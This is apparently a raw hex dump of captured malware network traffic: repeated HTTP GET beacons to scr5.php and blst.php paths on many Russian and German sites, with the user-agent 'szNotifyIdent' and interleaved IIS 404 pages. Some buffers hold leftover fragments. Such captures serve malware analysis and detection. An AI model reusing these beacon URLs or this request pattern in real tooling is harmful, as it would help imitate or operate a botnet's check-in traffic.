0x000000d0 (00208)   0d0a650d 0a0d0a65 702d416c 6976650d   ..e....ep-Alive.
0x000000e0 (00224)   0a0d0a                                ...

0x00000000 (00000)   47455420 2f736372 352e7068 703f703d   GET /scr5.php?p=
0x00000010 (00016)   33373432 35266964 3d393834 38393336   37425&id=9848936
0x00000020 (00032)   31392048 5454502f 312e310d 0a557365   19 HTTP/1.1..Use
0x00000030 (00048)   722d4167 656e743a 20737a4e 6f746966   r-Agent: szNotif
0x00000040 (00064)   79496465 6e740d0a 486f7374 3a206d69   yIdent..Host: mi
0x00000050 (00080)   722d6175 746f2e72 750d0a0d 0a696c6c   r-auto.ru....ill
0x00000060 (00096)   612f342e 30202863 6f6d7061 7469626c   a/4.0 (compatibl
0x00000070 (00112)   653b204d 53494520 362e303b 2057696e   e; MSIE 6.0; Win
0x00000080 (00128)   646f7773 204e5420 352e313b 20535631   dows NT 5.1; SV1
0x00000090 (00144)   3b202e4e 45542043 4c522032 2e302e35   ; .NET CLR 2.0.5
0x000000a0 (00160)   30373237 290d0a48 6f73743a 20726477   0727)..Host: rdw
0x000000b0 (00176)   7566612e 72750d0a 436f6e6e 65637469   ufa.ru..Connecti
0x000000c0 (00192)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000d0 (00208)   0d0a650d 0a0d0a65 702d416c 6976650d   ..e....ep-Alive.
0x000000e0 (00224)   0a0d0a                                ...

0x00000000 (00000)   47455420 2f70726f 672f696d 672f7072   GET /prog/img/pr
0x00000010 (00016)   6f697a76 6f642f62 6c73742e 70687020   oizvod/blst.php 
0x00000020 (00032)   48545450 2f312e31 0d0a4163 63657074   HTTP/1.1..Accept
0x00000030 (00048)   3a202a2f 2a0d0a41 63636570 742d456e   : */*..Accept-En
0x00000040 (00064)   636f6469 6e673a20 677a6970 2c206465   coding: gzip, de
0x00000050 (00080)   666c6174 650d0a55 7365722d 4167656e   flate..User-Agen
0x00000060 (00096)   743a204d 6f7a696c 6c612f34 2e302028   t: Mozilla/4.0 (
0x00000070 (00112)   636f6d70 61746962 6c653b20 4d534945   compatible; MSIE
0x00000080 (00128)   20362e30 3b205769 6e646f77 73204e54    6.0; Windows NT
0x00000090 (00144)   20352e31 3b205356 313b202e 4e455420    5.1; SV1; .NET 
0x000000a0 (00160)   434c5220 322e302e 35303732 37290d0a   CLR 2.0.50727)..
0x000000b0 (00176)   486f7374 3a206176 69737472 6164652e   Host: avistrade.
0x000000c0 (00192)   72750d0a 436f6e6e 65637469 6f6e3a20   ru..Connection: 
0x000000d0 (00208)   4b656570 2d416c69 76650d0a 0d0a650d   Keep-Alive....e.
0x000000e0 (00224)   0a0d0a                                ...

0x00000000 (00000)   47455420 2f686f6d 652f6c69 6e6b732f   GET /home/links/
0x00000010 (00016)   70696373 2f736372 352e7068 703f703d   pics/scr5.php?p=
0x00000020 (00032)   33373432 35266964 3d393834 38393336   37425&id=9848936
0x00000030 (00048)   31392048 5454502f 312e310d 0a557365   19 HTTP/1.1..Use
0x00000040 (00064)   722d4167 656e743a 20737a4e 6f746966   r-Agent: szNotif
0x00000050 (00080)   79496465 6e740d0a 486f7374 3a207777   yIdent..Host: ww
0x00000060 (00096)   772e6868 632d6f6e 6c696e65 2e64650d   w.hhc-online.de.
0x00000070 (00112)   0a0d0a70 61746962 6c653b20 4d534945   ...patible; MSIE
0x00000080 (00128)   20362e30 3b205769 6e646f77 73204e54    6.0; Windows NT
0x00000090 (00144)   20352e31 3b205356 313b202e 4e455420    5.1; SV1; .NET 
0x000000a0 (00160)   434c5220 322e302e 35303732 37290d0a   CLR 2.0.50727)..
0x000000b0 (00176)   486f7374 3a206176 69737472 6164652e   Host: avistrade.
0x000000c0 (00192)   72750d0a 436f6e6e 65637469 6f6e3a20   ru..Connection: 
0x000000d0 (00208)   4b656570 2d416c69 76650d0a 0d0a650d   Keep-Alive....e.
0x000000e0 (00224)   0a0d0a                                ...

0x00000000 (00000)   47455420 2f696d67 2f706963 742f7363   GET /img/pict/sc
0x00000010 (00016)   72352e70 68703f70 3d333734 32352669   r5.php?p=37425&i
0x00000020 (00032)   643d3938 34383933 36313920 48545450   d=984893619 HTTP
0x00000030 (00048)   2f312e31 0d0a5573 65722d41 67656e74   /1.1..User-Agent
0x00000040 (00064)   3a20737a 4e6f7469 66794964 656e740d   : szNotifyIdent.
0x00000050 (00080)   0a486f73 743a2067 617a2d73 65727669   .Host: gaz-servi
0x00000060 (00096)   63652e72 750d0a0d 0a696e65 2e64650d   ce.ru....ine.de.
0x00000070 (00112)   0a0d0a70 61746962 6c653b20 4d534945   ...patible; MSIE
0x00000080 (00128)   20362e30 3b205769 6e646f77 73204e54    6.0; Windows NT
0x00000090 (00144)   20352e31 3b205356 313b202e 4e455420    5.1; SV1; .NET 
0x000000a0 (00160)   434c5220 322e302e 35303732 37290d0a   CLR 2.0.50727)..
0x000000b0 (00176)   486f7374 3a206176 69737472 6164652e   Host: avistrade.
0x000000c0 (00192)   72750d0a 436f6e6e 65637469 6f6e3a20   ru..Connection: 
0x000000d0 (00208)   4b656570 2d416c69 76650d0a 0d0a650d   Keep-Alive....e.
0x000000e0 (00224)   0a0d0a                                ...

0x00000000 (00000)   47455420 2f696d67 2f706963 742f7363   GET /img/pict/sc
0x00000010 (00016)   72352e70 68703f70 3d333734 32352669   r5.php?p=37425&i
0x00000020 (00032)   643d3938 34383933 36313920 48545450   d=984893619 HTTP
0x00000030 (00048)   2f312e31 0d0a5573 65722d41 67656e74   /1.1..User-Agent
0x00000040 (00064)   3a20737a 4e6f7469 66794964 656e740d   : szNotifyIdent.
0x00000050 (00080)   0a486f73 743a2072 64777566 612e7275   .Host: rdwufa.ru
0x00000060 (00096)   0d0a0d0a 750d0a0d 0a696e65 2e64650d   ....u....ine.de.
0x00000070 (00112)   0a0d0a70 61746962 6c653b20 4d534945   ...patible; MSIE
0x00000080 (00128)   20362e30 3b205769 6e646f77 73204e54    6.0; Windows NT
0x00000090 (00144)   20352e31 3b205356 313b202e 4e455420    5.1; SV1; .NET 
0x000000a0 (00160)   434c5220 322e302e 35303732 37290d0a   CLR 2.0.50727)..
0x000000b0 (00176)   486f7374 3a206176 69737472 6164652e   Host: avistrade.
0x000000c0 (00192)   72750d0a 436f6e6e 65637469 6f6e3a20   ru..Connection: 
0x000000d0 (00208)   4b656570 2d416c69 76650d0a 0d0a650d   Keep-Alive....e.
0x000000e0 (00224)   0a0d0a                                ...

0x00000000 (00000)   47455420 2f736573 73696f6e 732f7363   GET /sessions/sc
0x00000010 (00016)   72352e70 68703f70 3d333734 32352669   r5.php?p=37425&i
0x00000020 (00032)   643d3938 34383933 36313920 48545450   d=984893619 HTTP
0x00000030 (00048)   2f312e31 0d0a5573 65722d41 67656e74   /1.1..User-Agent
0x00000040 (00064)   3a20737a 4e6f7469 66794964 656e740d   : szNotifyIdent.
0x00000050 (00080)   0a486f73 743a2077 77772e6b 6f6d616e   .Host: www.koman
0x00000060 (00096)   646f722e 72750d0a 0d0a6e65 2e64650d   dor.ru....ne.de.
0x00000070 (00112)   0a0d0a70 61746962 6c653b20 4d534945   ...patible; MSIE
0x00000080 (00128)   20362e30 3b205769 6e646f77 73204e54    6.0; Windows NT
0x00000090 (00144)   20352e31 3b205356 313b202e 4e455420    5.1; SV1; .NET 
0x000000a0 (00160)   434c5220 322e302e 35303732 37290d0a   CLR 2.0.50727)..
0x000000b0 (00176)   486f7374 3a206176 69737472 6164652e   Host: avistrade.
0x000000c0 (00192)   72750d0a 436f6e6e 65637469 6f6e3a20   ru..Connection: 
0x000000d0 (00208)   4b656570 2d416c69 76650d0a 0d0a650d   Keep-Alive....e.
0x000000e0 (00224)   0a0d0a                                ...

0x00000000 (00000)   47455420 2f76616b 616e732f 626c7374   GET /vakans/blst
0x00000010 (00016)   2e706870 20485454 502f312e 310d0a41   .php HTTP/1.1..A
0x00000020 (00032)   63636570 743a202a 2f2a0d0a 41636365   ccept: */*..Acce
0x00000030 (00048)   70742d45 6e636f64 696e673a 20677a69   pt-Encoding: gzi
0x00000040 (00064)   702c2064 65666c61 74650d0a 55736572   p, deflate..User
0x00000050 (00080)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000060 (00096)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x00000070 (00112)   204d5349 4520362e 303b2057 696e646f    MSIE 6.0; Windo
0x00000080 (00128)   7773204e 5420352e 313b2053 56313b20   ws NT 5.1; SV1; 
0x00000090 (00144)   2e4e4554 20434c52 20322e30 2e353037   .NET CLR 2.0.507
0x000000a0 (00160)   3237290d 0a486f73 743a206d 6f6e6f6d   27)..Host: monom
0x000000b0 (00176)   61682d63 6974792e 72750d0a 436f6e6e   ah-city.ru..Conn
0x000000c0 (00192)   65637469 6f6e3a20 4b656570 2d416c69   ection: Keep-Ali
0x000000d0 (00208)   76650d0a 0d0a6c69 76650d0a 0d0a650d   ve....live....e.
0x000000e0 (00224)   0a0d0a                                ...

0x00000000 (00000)   47455420 2f73706f 72742f6f 6d656761   GET /sport/omega
0x00000010 (00016)   2f706963 2f6f6d65 67612f73 6372352e   /pic/omega/scr5.
0x00000020 (00032)   7068703f 703d3337 34323526 69643d39   php?p=37425&id=9
0x00000030 (00048)   38343839 33363139 20485454 502f312e   84893619 HTTP/1.
0x00000040 (00064)   310d0a55 7365722d 4167656e 743a2073   1..User-Agent: s
0x00000050 (00080)   7a4e6f74 69667949 64656e74 0d0a486f   zNotifyIdent..Ho
0x00000060 (00096)   73743a20 7777772e 6d697261 67652e72   st: www.mirage.r
0x00000070 (00112)   750d0a0d 0a20362e 303b2057 696e646f   u.... 6.0; Windo
0x00000080 (00128)   7773204e 5420352e 313b2053 56313b20   ws NT 5.1; SV1; 
0x00000090 (00144)   2e4e4554 20434c52 20322e30 2e353037   .NET CLR 2.0.507
0x000000a0 (00160)   3237290d 0a486f73 743a206d 6f6e6f6d   27)..Host: monom
0x000000b0 (00176)   61682d63 6974792e 72750d0a 436f6e6e   ah-city.ru..Conn
0x000000c0 (00192)   65637469 6f6e3a20 4b656570 2d416c69   ection: Keep-Ali
0x000000d0 (00208)   76650d0a 0d0a6c69 76650d0a 0d0a650d   ve....live....e.
0x000000e0 (00224)   0a0d0a                                ...

0x00000000 (00000)   47455420 2f70726f 672f696d 672f7072   GET /prog/img/pr
0x00000010 (00016)   6f697a76 6f642f73 6372352e 7068703f   oizvod/scr5.php?
0x00000020 (00032)   703d3337 34323526 69643d39 38343839   p=37425&id=98489
0x00000030 (00048)   33363139 20485454 502f312e 310d0a55   3619 HTTP/1.1..U
0x00000040 (00064)   7365722d 4167656e 743a2073 7a4e6f74   ser-Agent: szNot
0x00000050 (00080)   69667949 64656e74 0d0a486f 73743a20   ifyIdent..Host: 
0x00000060 (00096)   61766973 74726164 652e7275 0d0a0d0a   avistrade.ru....
0x00000070 (00112)   750d0a0d 0a20362e 303b2057 696e646f   u.... 6.0; Windo
0x00000080 (00128)   7773204e 5420352e 313b2053 56313b20   ws NT 5.1; SV1; 
0x00000090 (00144)   2e4e4554 20434c52 20322e30 2e353037   .NET CLR 2.0.507
0x000000a0 (00160)   3237290d 0a486f73 743a206d 6f6e6f6d   27)..Host: monom
0x000000b0 (00176)   61682d63 6974792e 72750d0a 436f6e6e   ah-city.ru..Conn
0x000000c0 (00192)   65637469 6f6e3a20 4b656570 2d416c69   ection: Keep-Ali
0x000000d0 (00208)   76650d0a 0d0a6c69 76650d0a 0d0a650d   ve....live....e.
0x000000e0 (00224)   0a0d0a                                ...

0x00000000 (00000)   47455420 2f446573 69676e2f 73637235   GET /Design/scr5
0x00000010 (00016)   2e706870 3f703d33 37343235 2669643d   .php?p=37425&id=
0x00000020 (00032)   39383438 39333631 39204854 54502f31   984893619 HTTP/1
0x00000030 (00048)   2e310d0a 55736572 2d416765 6e743a20   .1..User-Agent: 
0x00000040 (00064)   737a4e6f 74696679 4964656e 740d0a48   szNotifyIdent..H
0x00000050 (00080)   6f73743a 20777777 2e74686f 6d61732d   ost: www.thomas-
0x00000060 (00096)   77652e64 650d0a0d 0a                  we.de....

0x00000000 (00000)   47455420 2f702f6c 616e672f 4356532f   GET /p/lang/CVS/
0x00000010 (00016)   626c7374 2e706870 20485454 502f312e   blst.php HTTP/1.
0x00000020 (00032)   310d0a41 63636570 743a202a 2f2a0d0a   1..Accept: */*..
0x00000030 (00048)   41636365 70742d45 6e636f64 696e673a   Accept-Encoding:
0x00000040 (00064)   20677a69 702c2064 65666c61 74650d0a    gzip, deflate..
0x00000050 (00080)   55736572 2d416765 6e743a20 4d6f7a69   User-Agent: Mozi
0x00000060 (00096)   6c6c612f 342e3020 28636f6d 70617469   lla/4.0 (compati
0x00000070 (00112)   626c653b 204d5349 4520362e 303b2057   ble; MSIE 6.0; W
0x00000080 (00128)   696e646f 7773204e 5420352e 313b2053   indows NT 5.1; S
0x00000090 (00144)   56313b20 2e4e4554 20434c52 20322e30   V1; .NET CLR 2.0
0x000000a0 (00160)   2e353037 3237290d 0a486f73 743a206d   .50727)..Host: m
0x000000b0 (00176)   69722d76 65736f76 2e72750d 0a436f6e   ir-vesov.ru..Con
0x000000c0 (00192)   6e656374 696f6e3a 204b6565 702d416c   nection: Keep-Al
0x000000d0 (00208)   6976650d 0a0d0a6f 756e643c 2f68313e   ive....ound</h1>
0x000000e0 (00224)   0a202020 203c703e 596f7572 2062726f   .    <p>Your bro
0x000000f0 (00240)   77736572 2073656e 74206120 72657175   wser sent a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f76616b 616e732f 73637235   GET /vakans/scr5
0x00000010 (00016)   2e706870 3f703d33 37343235 2669643d   .php?p=37425&id=
0x00000020 (00032)   39383438 39333631 39204854 54502f31   984893619 HTTP/1
0x00000030 (00048)   2e310d0a 55736572 2d416765 6e743a20   .1..User-Agent: 
0x00000040 (00064)   737a4e6f 74696679 4964656e 740d0a48   szNotifyIdent..H
0x00000050 (00080)   6f73743a 206d6f6e 6f6d6168 2d636974   ost: monomah-cit
0x00000060 (00096)   792e7275 0d0a0d0a 2c203234 204a616e   y.ru...., 24 Jan
0x00000070 (00112)   20323031 34203130 3a34313a 33372047    2014 10:41:37 G
0x00000080 (00128)   4d540d0a 0d0a3c68 746d6c3e 0a20203c   MT....<html>.  <
0x00000090 (00144)   68656164 3e0a2020 20203c74 69746c65   head>.    <title
0x000000a0 (00160)   3e343034 204e6f74 20466f75 6e643c2f   >404 Not Found</
0x000000b0 (00176)   7469746c 653e0a20 203c2f68 6561643e   title>.  </head>
0x000000c0 (00192)   0a20203c 626f6479 3e0a2020 20203c68   .  <body>.    <h
0x000000d0 (00208)   313e4e6f 7420466f 756e643c 2f68313e   1>Not Found</h1>
0x000000e0 (00224)   0a202020 203c703e 596f7572 2062726f   .    <p>Your bro
0x000000f0 (00240)   77736572 2073656e 74206120 72657175   wser sent a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f736f76 72656d2f 70616e6f   GET /sovrem/pano
0x00000010 (00016)   72616d61 2f626c73 742e7068 70204854   rama/blst.php HT
0x00000020 (00032)   54502f31 2e310d0a 41636365 70743a20   TP/1.1..Accept: 
0x00000030 (00048)   2a2f2a0d 0a416363 6570742d 456e636f   */*..Accept-Enco
0x00000040 (00064)   64696e67 3a20677a 69702c20 6465666c   ding: gzip, defl
0x00000050 (00080)   6174650d 0a557365 722d4167 656e743a   ate..User-Agent:
0x00000060 (00096)   204d6f7a 696c6c61 2f342e30 2028636f    Mozilla/4.0 (co
0x00000070 (00112)   6d706174 69626c65 3b204d53 49452036   mpatible; MSIE 6
0x00000080 (00128)   2e303b20 57696e64 6f777320 4e542035   .0; Windows NT 5
0x00000090 (00144)   2e313b20 5356313b 202e4e45 5420434c   .1; SV1; .NET CL
0x000000a0 (00160)   5220322e 302e3530 37323729 0d0a486f   R 2.0.50727)..Ho
0x000000b0 (00176)   73743a20 70726f6d 636f2e72 750d0a43   st: promco.ru..C
0x000000c0 (00192)   6f6e6e65 6374696f 6e3a204b 6565702d   onnection: Keep-
0x000000d0 (00208)   416c6976 650d0a0d 0a6e643c 2f68313e   Alive....nd</h1>
0x000000e0 (00224)   0a202020 203c703e 596f7572 2062726f   .    <p>Your bro
0x000000f0 (00240)   77736572 2073656e 74206120 72657175   wser sent a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f702f6c 616e672f 4356532f   GET /p/lang/CVS/
0x00000010 (00016)   73637235 2e706870 3f703d33 37343235   scr5.php?p=37425
0x00000020 (00032)   2669643d 39383438 39333631 39204854   &id=984893619 HT
0x00000030 (00048)   54502f31 2e310d0a 55736572 2d416765   TP/1.1..User-Age
0x00000040 (00064)   6e743a20 737a4e6f 74696679 4964656e   nt: szNotifyIden
0x00000050 (00080)   740d0a48 6f73743a 206d6972 2d766573   t..Host: mir-ves
0x00000060 (00096)   6f762e72 750d0a0d 0a203234 204a616e   ov.ru.... 24 Jan
0x00000070 (00112)   20323031 34203130 3a34313a 33372047    2014 10:41:37 G
0x00000080 (00128)   4d540d0a 0d0a3c68 746d6c3e 0a20203c   MT....<html>.  <
0x00000090 (00144)   68656164 3e0a2020 20203c74 69746c65   head>.    <title
0x000000a0 (00160)   3e343034 204e6f74 20466f75 6e643c2f   >404 Not Found</
0x000000b0 (00176)   7469746c 653e0a20 203c2f68 6561643e   title>.  </head>
0x000000c0 (00192)   0a20203c 626f6479 3e0a2020 20203c68   .  <body>.    <h
0x000000d0 (00208)   313e4e6f 7420466f 756e643c 2f68313e   1>Not Found</h1>
0x000000e0 (00224)   0a202020 203c703e 596f7572 2062726f   .    <p>Your bro
0x000000f0 (00240)   77736572 2073656e 74206120 72657175   wser sent a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f736f76 72656d2f 70616e6f   GET /sovrem/pano
0x00000010 (00016)   72616d61 2f736372 352e7068 703f703d   rama/scr5.php?p=
0x00000020 (00032)   33373432 35266964 3d393834 38393336   37425&id=9848936
0x00000030 (00048)   31392048 5454502f 312e310d 0a557365   19 HTTP/1.1..Use
0x00000040 (00064)   722d4167 656e743a 20737a4e 6f746966   r-Agent: szNotif
0x00000050 (00080)   79496465 6e740d0a 486f7374 3a207072   yIdent..Host: pr
0x00000060 (00096)   6f6d636f 2e72750d 0a0d0a34 204a616e   omco.ru....4 Jan
0x00000070 (00112)   20323031 34203130 3a34313a 33372047    2014 10:41:37 G
0x00000080 (00128)   4d540d0a 0d0a3c68 746d6c3e 0a20203c   MT....<html>.  <
0x00000090 (00144)   68656164 3e0a2020 20203c74 69746c65   head>.    <title
0x000000a0 (00160)   3e343034 204e6f74 20466f75 6e643c2f   >404 Not Found</
0x000000b0 (00176)   7469746c 653e0a20 203c2f68 6561643e   title>.  </head>
0x000000c0 (00192)   0a20203c 626f6479 3e0a2020 20203c68   .  <body>.    <h
0x000000d0 (00208)   313e4e6f 7420466f 756e643c 2f68313e   1>Not Found</h1>
0x000000e0 (00224)   0a202020 203c703e 596f7572 2062726f   .    <p>Your bro
0x000000f0 (00240)   77736572 2073656e 74206120 72657175   wser sent a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f5f7468 656d6573 2f6b6f70   GET /_themes/kop
0x00000010 (00016)   69652d76 6f6e2d66 616e7461 7369652d   ie-von-fantasie-
0x00000020 (00032)   696e2d62 6c61752f 73637235 2e706870   in-blau/scr5.php
0x00000030 (00048)   3f703d33 37343235 2669643d 39383438   ?p=37425&id=9848
0x00000040 (00064)   39333631 39204854 54502f31 2e310d0a   93619 HTTP/1.1..
0x00000050 (00080)   55736572 2d416765 6e743a20 737a4e6f   User-Agent: szNo
0x00000060 (00096)   74696679 4964656e 740d0a48 6f73743a   tifyIdent..Host:
0x00000070 (00112)   20777777 2e313374 77323272 69676f62    www.13tw22rigob
0x00000080 (00128)   6572742e 64650d0a 0d0a6c3e 0a20203c   ert.de....l>.  <
0x00000090 (00144)   68656164 3e0a2020 20203c74 69746c65   head>.    <title
0x000000a0 (00160)   3e343034 204e6f74 20466f75 6e643c2f   >404 Not Found</
0x000000b0 (00176)   7469746c 653e0a20 203c2f68 6561643e   title>.  </head>
0x000000c0 (00192)   0a20203c 626f6479 3e0a2020 20203c68   .  <body>.    <h
0x000000d0 (00208)   313e4e6f 7420466f 756e643c 2f68313e   1>Not Found</h1>
0x000000e0 (00224)   0a202020 203c703e 596f7572 2062726f   .    <p>Your bro
0x000000f0 (00240)   77736572 2073656e 74206120 72657175   wser sent a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f5f7468 656d6573 2f6b6f70   GET /_themes/kop
0x00000010 (00016)   69652d76 6f6e2d66 616e7461 7369652d   ie-von-fantasie-
0x00000020 (00032)   696e2d62 6c61752f 626c7374 2e706870   in-blau/blst.php
0x00000030 (00048)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000040 (00064)   743a202a 2f2a0d0a 41636365 70742d45   t: */*..Accept-E
0x00000050 (00080)   6e636f64 696e673a 20677a69 702c2064   ncoding: gzip, d
0x00000060 (00096)   65666c61 74650d0a 55736572 2d416765   eflate..User-Age
0x00000070 (00112)   6e743a20 4d6f7a69 6c6c612f 342e3020   nt: Mozilla/4.0 
0x00000080 (00128)   28636f6d 70617469 626c653b 204d5349   (compatible; MSI
0x00000090 (00144)   4520362e 303b2057 696e646f 7773204e   E 6.0; Windows N
0x000000a0 (00160)   5420352e 313b2053 56313b20 2e4e4554   T 5.1; SV1; .NET
0x000000b0 (00176)   20434c52 20322e30 2e353037 3237290d    CLR 2.0.50727).
0x000000c0 (00192)   0a486f73 743a2077 77772e31 33747732   .Host: www.13tw2
0x000000d0 (00208)   32726967 6f626572 742e6465 0d0a436f   2rigobert.de..Co
0x000000e0 (00224)   6e6e6563 74696f6e 3a204b65 65702d41   nnection: Keep-A
0x000000f0 (00240)   6c697665 0d0a0d0a 74206120 72657175   live....t a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f696e68 616c742f 6d697467   GET /inhalt/mitg
0x00000010 (00016)   6c696564 65722f66 6f746f2f 73637235   lieder/foto/scr5
0x00000020 (00032)   2e706870 3f703d33 37343235 2669643d   .php?p=37425&id=
0x00000030 (00048)   39383438 39333631 39204854 54502f31   984893619 HTTP/1
0x00000040 (00064)   2e310d0a 55736572 2d416765 6e743a20   .1..User-Agent: 
0x00000050 (00080)   737a4e6f 74696679 4964656e 740d0a48   szNotifyIdent..H
0x00000060 (00096)   6f73743a 20646965 2d636c69 71756565   ost: die-cliquee
0x00000070 (00112)   2e64650d 0a0d0a30 3a34313a 33372047   .de....0:41:37 G
0x00000080 (00128)   4d540d0a 0d0a3c68 746d6c3e 0a20203c   MT....<html>.  <
0x00000090 (00144)   68656164 3e0a2020 20203c74 69746c65   head>.    <title
0x000000a0 (00160)   3e343034 204e6f74 20466f75 6e643c2f   >404 Not Found</
0x000000b0 (00176)   7469746c 653e0a20 203c2f68 6561643e   title>.  </head>
0x000000c0 (00192)   0a20203c 626f6479 3e0a2020 20203c68   .  <body>.    <h
0x000000d0 (00208)   313e4e6f 7420466f 756e643c 2f68313e   1>Not Found</h1>
0x000000e0 (00224)   0a202020 203c703e 596f7572 2062726f   .    <p>Your bro
0x000000f0 (00240)   77736572 2073656e 74206120 72657175   wser sent a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f696e68 616c742f 6d697467   GET /inhalt/mitg
0x00000010 (00016)   6c696564 65722f66 6f746f2f 626c7374   lieder/foto/blst
0x00000020 (00032)   2e706870 20485454 502f312e 310d0a41   .php HTTP/1.1..A
